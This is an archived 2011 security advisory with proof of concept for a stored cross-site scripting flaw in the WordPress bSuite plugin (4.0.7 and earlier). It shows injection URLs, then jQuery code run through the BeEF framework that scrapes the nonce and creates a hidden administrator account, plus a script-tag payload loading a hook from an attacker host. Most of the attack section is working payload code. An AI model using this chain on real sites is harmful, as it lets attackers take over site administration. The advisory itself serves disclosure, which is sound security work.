WordPress bSuite 4.0.7 Cross Site Scripting

2011-07-19T00:00:00
ID PACKETSTORM:103137
Type packetstorm
Reporter IHTeam
Modified 2011-07-19T00:00:00

Description

                                        
                                            `Original advisory:  
http://www.ihteam.net/advisory/bsuite-wordpress-permanent-xss/  
  
*WordPress bSuite <= 4.0.7 Permanent XSS -> Add Admin*  
*Download link:* http://wordpress.org/extend/plugins/bsuite/  
*Author contact:* 29/06/2011  
*POC published:* 11/07/2011  
Plugin is out-of-date, last update on 2009, so this is just a POC that  
show how  
to made the XSS more useful  
  
*FIX:* Add htmlspecialchars to output  
  
*Bug found by:* IHTeam  
  
*Follow us on Twitter! @IHTeam <http://twitter.com/IHTeam>*  
  
*CHECK BSUITE:*  
  
http://192.168.1.100/wordpress/plugins/bsuite/js/bsuite.js  
  
*PERMANENT XSS POC:*  
You can inject XSS in different way, for example:  
  
http://192.168.1.100/wordpress/?s=<h2>XSSED</h2>  
  
or directly in URL:  
  
http://192.168.1.100/wordpress/?p=1&<h1>XSSED</h1>  
  
Now, when admin enter in bSuite panel, will see the XSSED code  
  
<http://www.ihteam.net/wp-content/uploads/bsuite_XSSED.jpeg>  
  
*XSS TO REMOTE ADMIN ADD:  
*We will use beef <http://beefproject.com/>to do that part. So:  
  
1. Run beef on you local machine  
2. Enable auto-run that code:  
  
jQuery(“<div>”, {  
id: “testbeef”  
}).appendTo(“#screen-meta-links”);  
jQuery.get(“user-new.php”, function(data) {  
jQuery(“#testbeef”).html(data);  
var nonce=jQuery(“#_wpnonce_create-user”).val();  
jQuery(“#testbeef”).html(“”);  
  
jQuery.post(“user-new.php”, {  
“_wp_http_referer”: “/wordpress/wp-admin/user-new.php”,  
“_wpnonce_create-user”: nonce,  
action: “createuser”,  
createuser: “Add New User”,  
email: “hax0rmail@mail.com”,  
first_name: “”,  
last_name: “”,  
pass1: “123123hello”,  
pass2: “123123hello”,  
role: “administrator”,  
url: “”,  
user_login: “hax0r”  
});  
  
});  
  
We make 2 request to //wordpress/wp-admin/user-new.php/ because we need  
to grab  
/_wpnonce_create-user/ value.  
  
1. First create a new div with ID /testbeef/  
2. Request user-new.php and append content to the DIV  
3. Grab _wpnonce_create-user value to nonce variable  
4. Clean the DIV content;  
5. Make a POST request to user-new.php with the correct values  
  
Review the code to change _wp_http_referer, pass1, pass2 and user_login  
of the  
POST request.  
Now it’s time to inject the beef control script in bSuite like this:  
  
http://192.168.1.100/s=<script  
src=”http://192.168.1.102/beef/hook/beefmagic.js.php”></script>  
  
You may wait 1h to 5h for bSuit refresh. It will result in new admin with  
username: /haxor/ and password: /123123hello/  
`